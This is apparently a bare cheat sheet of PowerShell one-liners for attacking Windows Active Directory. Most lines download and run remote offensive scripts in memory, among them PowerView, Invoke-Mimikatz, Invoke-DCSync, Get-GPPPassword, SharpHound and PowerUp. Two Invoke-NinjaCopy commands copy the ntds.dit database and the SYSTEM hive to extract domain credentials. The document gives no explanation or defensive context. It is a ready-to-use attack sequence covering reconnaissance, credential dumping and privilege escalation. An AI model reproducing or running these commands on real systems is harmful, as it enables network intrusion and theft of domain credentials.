iex (new-object net.webclient).downloadstring('')

iex (new-object net.webclient).downloadstring('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/Invoke-Portscan.ps1')

iex (new-object net.webclient).downloadstring('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1')

iex (new-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/ADModule/master/Import-ActiveDirectory.ps1');Import-ActiveDirectory

iex (new-object net.webclient).downloadstring('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Exfiltration/Get-GPPPassword.ps1')

[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; IEX (new-object net.webclient).downloadstring('https://gitlab.com/ciyinet/ciyinotes/raw/master/Tools/Invoke-Mimikatz.ps1')

[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; IEX (new-object net.webclient).downloadstring('https://gitlab.com/ciyinet/ciyinotes/raw/master/Tools/Invoke-Win32Check.ps1')

Mimikatz 2.2.0 fixed for Win10 ver 1903 build 18362:


iex (new-object net.webclient).downloadstring('https://raw.githubusercontent.com/AddaxSoft/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1')

[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; IEX (new-object net.webclient).downloadstring('https://gitlab.com/ciyinet/ciyinotes/raw/master/Tools/Invoke-DCSync.ps1')

IEX (New-Object Net.WebClient).DownloadString(' https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-NinjaCopy.ps1')

Invoke-NinjaCopy -Path "C:\Windows\NTDS\ntds.dit" -LocalDestination "C:\ntds.dit"

Invoke-NinjaCopy -Path "C:\Windows\System32\config\SYSTEM" -LocalDestination "C:\SYSTEM"

iex (new-object net.webclient).downloadstring('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/SharpHound.ps1')

iex (new-object net.webclient).downloadstring('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Privesc/PowerUp.ps1')

